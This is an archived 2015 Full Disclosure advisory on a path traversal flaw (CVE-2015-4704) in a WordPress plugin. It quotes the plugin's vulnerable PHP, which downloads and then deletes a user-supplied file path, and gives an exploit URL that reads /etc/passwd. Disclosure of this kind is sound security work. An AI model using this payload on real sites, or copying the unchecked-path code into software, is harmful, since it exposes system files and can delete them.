| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-id: <80E0C5D3-3335-4C39-B261-617EB99E4081@me.com>
Date: Thu, 25 Jun 2015 20:44:56 -0400
From: "Larry W. Cashdollar" <larry0@...com>
To: fulldisclosure@...lists.org
Subject: [FD] Remote file download vulnerability in download-zip-attachments
v1.0
Title: Remote file download vulnerability in download-zip-attachments v1.0
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-10
Download Site: https://wordpress.org/plugins/download-zip-attachments/
Vendor: rivenvirus
Vendor Notified: 2015-06-15
Vendor Contact: https://profiles.wordpress.org/rivenvirus/
Advisory: http://www.vapid.dhs.org/advisory.php?v=129
Description:
Download all attachments from the post into a zip file.
Vulnerability:
from download-zip-attachments/download.php makes no checks to verify the download path is with in the specified upload directory.
<?php
if(isset($_REQUEST['File']) && !empty($_REQUEST['File'])){
define('WP_USE_THEMES', false);
require('../../../wp-load.php');
require "create_zip_file.php";
$uploads = wp_upload_dir();
$tmp_location = $uploads['path']."/".$_REQUEST['File'];
//echo $tmp_location;
$zip = new CreateZipFile;
$zip->forceDownload($tmp_location,false);
unlink($tmp_location);
exit;
}
CVEID: 2015-4704
OSVDB:
Exploit Code:
• http://www.example.com/wp-content/plugins/download-zip-attachments/download.php?File=../../../../../../../../etc/passwd
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists